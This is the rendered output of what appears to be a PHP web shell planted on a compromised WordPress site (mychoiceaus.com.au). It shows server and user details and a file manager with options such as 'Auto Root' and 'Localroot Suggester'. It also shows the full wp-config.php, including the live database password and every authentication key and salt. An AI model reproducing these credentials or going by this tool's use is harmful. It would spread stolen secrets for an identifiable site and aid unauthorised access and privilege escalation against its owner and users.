Linux server193.iseencloud.com 5.14.0-611.49.2.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Apr 30 09:05:08 EDT 2026 x86_64
LiteSpeed
Server IP : 43.242.226.197 & Your IP : 216.73.216.5
Domains :
Cant Read [ /etc/named.conf ]
User : amazingd
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home5 /
amazingd /
mychoiceaus.com.au /
Delete
Unzip
Name
Size
Permission
Date
Action
.well-known
[ DIR ]
drwxr-xr-x
2025-01-19 08:57
644046
[ DIR ]
drwxr-xr-x
2026-05-10 18:56
cgi-bin
[ DIR ]
drwxr-xr-x
2026-05-10 05:40
images
[ DIR ]
drwxr-xr-x
2026-05-10 21:01
wp-admin
[ DIR ]
drwxr-xr-x
2026-05-10 21:02
wp-content
[ DIR ]
drwxr-xr-x
2026-05-09 03:56
wp-includes
[ DIR ]
drwxr-xr-x
2026-05-10 21:02
.htaccess
1.99
KB
-r--r--r--
2026-05-10 21:01
error_log
75.28
KB
-rw-r--r--
2026-05-11 01:10
index.php
22.45
KB
-r--r--r--
2026-05-09 01:58
wp-activate.php
7.21
KB
-rw-r--r--
2024-11-02 10:05
wp-blog-header.php
351
B
-rwxr-xr-x
2020-02-06 06:33
wp-comments-post.php
2.27
KB
-rw-r--r--
2024-11-02 10:05
wp-config-sample.php
2.96
KB
-rw-r--r--
2024-11-02 10:05
wp-config.php
3.08
KB
-rw-r--r--
2025-01-25 08:50
wp-cron.php
5.51
KB
-rw-r--r--
2024-11-02 10:05
wp-links-opml.php
2.44
KB
-rw-r--r--
2024-11-02 10:05
wp-load.php
3.84
KB
-rw-r--r--
2024-11-02 10:05
wp-login.php
50.04
KB
-rw-r--r--
2024-11-02 10:05
wp-mail.php
8.33
KB
-rw-r--r--
2024-11-02 10:05
wp-settings.php
28.1
KB
-rw-r--r--
2024-11-02 10:05
wp-signup.php
33.58
KB
-rw-r--r--
2024-11-02 10:05
wp-trackback.php
4.77
KB
-rw-r--r--
2024-11-02 10:05
Save
Rename
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the * installation. You don't have to use the web site, you can * copy this file to "wp-config.php" and fill in the values. * * This file contains the following configurations: * * * MySQL settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'amazingd_MYchoiceAUS' ); /** MySQL database username */ define( 'DB_USER', 'amazingd_MYchoiceAUS' ); /** MySQL database password */ define( 'DB_PASSWORD', 'xY;R}Z.cAKflT@Z' ); /** MySQL hostname */ define( 'DB_HOST', 'localhost' ); /** Database Charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8mb4' ); /** The Database Collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); define('DISABLE_WP_CRON', true); /**#@+ * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'txpr0ow9rdk1hym0gje7s7k17uwqh4nibefqlkikl0zskbrix0aedhcpfdus7fml' ); define( 'SECURE_AUTH_KEY', '0saj0hhognoifg2ibsdxcn2dzwbkw4isiaupllo8tngwqkvm46x7jj4kplknzww3' ); define( 'LOGGED_IN_KEY', 'xtfxmbohzwiytcmohx15byzbjgac5f6qqggichwcw8yh063mezlft9kamvxtowmz' ); define( 'NONCE_KEY', 'rggafewblswifv6ld0ivko4zbsdjoe6f8ajyj3x4t0f0dzwnfxhev8t2ghwiueyb' ); define( 'AUTH_SALT', 'dr6lbf6lvqbxzz0vbztlv4uuoxjjcyhgpuvwxzbt4pzpvrhwpzuzldaugqx6ysqe' ); define( 'SECURE_AUTH_SALT', '0oviw4gjdg6rledcwyuxfddt9skl43i3xvunsvwq3pujxkryfj3xqdkbv2smh25z' ); define( 'LOGGED_IN_SALT', 'xjfz5clbd0w2iixnlirc7wkuut1vuszchtsjodnu0wkzkucg6fax7jrx0r5rwh9q' ); define( 'NONCE_SALT', 'p62r0gdkohapfajbuetbqwsfclam0qah8geqbkweuibeb8t7bgznuzujkqeauywz' ); /**#@-*/ /** * WordPress Database Table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wpey_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ define( 'WP_DEBUG', false ); /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';